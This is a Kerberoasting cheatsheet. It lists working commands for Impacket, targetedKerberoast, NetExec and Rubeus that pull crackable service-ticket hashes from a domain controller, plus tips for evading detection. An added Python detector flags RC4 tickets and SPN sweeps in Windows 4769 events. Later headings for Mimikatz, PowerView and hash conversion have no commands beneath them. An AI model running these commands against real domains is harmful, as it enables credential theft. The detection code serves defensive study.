Kerberoasting
Cheatsheet with commands for performing Kerberoasting from the outside and inside.
Requesting hashes with Impacket:
impacket-GetUserSPNs -dc-ip <DC_IP> <domain>/<user>:<pass> -request -outputfile hashes.txt
Supports AES keys (-aesKey), Kerberos auth (-k), and targeted users (-usersfile).
ACL abuse Kerberoasting with targetedKerberoast:
./targetedKerberoast.py -d <domain> -u <user> -p <pass> --dc-ip <DC_IP>
Requesting hashes with NetExec:
nxc ldap <DC_IP> -u <user> -p <pass> --kerberoasting hashes.txt
Fast enumeration and roasting with built-in OPSEC options like AES256 preference.
Requesting hashes with Rubeus:
Rubeus.exe kerberoast /user:<target> /outfile:hashes.txt
or full enum:
Rubeus.exe kerberoast /outfile:hashes.txt
Use /aes256 for OPSEC, /interval:60s to space requests, and /nowrap to mimic LSASS flags.
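Detection side of the AES256 and request-spacing options above, as an added example (not part of the original cheatsheet or of any tool listed here): it scans Kerberos service ticket events (Windows Event ID 4769) for RC4 tickets and for one account requesting tickets for many distinct service accounts inside a time window. The sample events, account names, and thresholds are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17  # TicketEncryptionType 23; 0x11 / 0x12 are AES128 / AES256

# Constructed sample of Event ID 4769 fields:
# (time, requesting account, ServiceName, TicketEncryptionType)
EVENTS = [
    ("2024-05-01T09:00:00", "alice@CORP.EXAMPLE", "FILESRV01$", 0x12),
    ("2024-05-01T09:05:00", "alice@CORP.EXAMPLE", "svc_sql", 0x12),
    # RC4 burst: four service accounts within a few seconds
    ("2024-05-01T10:00:00", "bob@CORP.EXAMPLE", "svc_sql", 0x17),
    ("2024-05-01T10:00:01", "bob@CORP.EXAMPLE", "svc_web", 0x17),
    ("2024-05-01T10:00:02", "bob@CORP.EXAMPLE", "svc_backup", 0x17),
    ("2024-05-01T10:00:03", "bob@CORP.EXAMPLE", "svc_mail", 0x17),
    # AES256 tickets spaced 60 seconds apart: an RC4-only rule never fires
    ("2024-05-01T11:00:00", "carol@CORP.EXAMPLE", "svc_sql", 0x12),
    ("2024-05-01T11:01:00", "carol@CORP.EXAMPLE", "svc_web", 0x12),
    ("2024-05-01T11:02:00", "carol@CORP.EXAMPLE", "svc_backup", 0x12),
    ("2024-05-01T11:03:00", "carol@CORP.EXAMPLE", "svc_mail", 0x12),
]

def detect(events, window=timedelta(hours=1), min_services=4):
    """Return {account: [reasons]} for accounts whose requests look like roasting."""
    per_account = defaultdict(list)
    for ts, account, service, etype in events:
        # Tickets for machine accounts and krbtgt are routine noise for this rule.
        if service.endswith("$") or service.lower() == "krbtgt":
            continue
        per_account[account].append((datetime.fromisoformat(ts), service, etype))
    findings = {}
    for account, reqs in per_account.items():
        reqs.sort()
        reasons = set()
        if any(etype == RC4_HMAC for _, _, etype in reqs):
            reasons.add("rc4_ticket")
        start = 0
        for end in range(len(reqs)):
            # Slide the window start forward until it spans at most `window`.
            while reqs[end][0] - reqs[start][0] > window:
                start += 1
            if len({svc for _, svc, _ in reqs[start:end + 1]}) >= min_services:
                reasons.add("spn_sweep")
                break
        if reasons:
            findings[account] = sorted(reasons)
    return findings

if __name__ == "__main__":
    for account, reasons in detect(EVENTS).items():
        print(account, reasons)
```

The distinct-service count only catches spaced requests when the window is longer than the spacing times the threshold, so tune `window` and `min_services` against a baseline of normal ticket activity.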
Enumerating SPNs with setspn.exe:
Retrieving All Tickets Using setspn.exe (May require PowerShell started as Administrator):
Extracting Tickets from Memory with Mimikatz:
Getting users with SPNs in target with PowerView:
Using PowerView to Target a Specific User:
Exporting All Tickets to a CSV File with PowerView:
Convert kirbi file to John format:
or:
Convert to Hashcat format:
Converting Kerberos Hash to oneline format in Linux:
Converting Kerberos Hash to oneline format in PowerShell: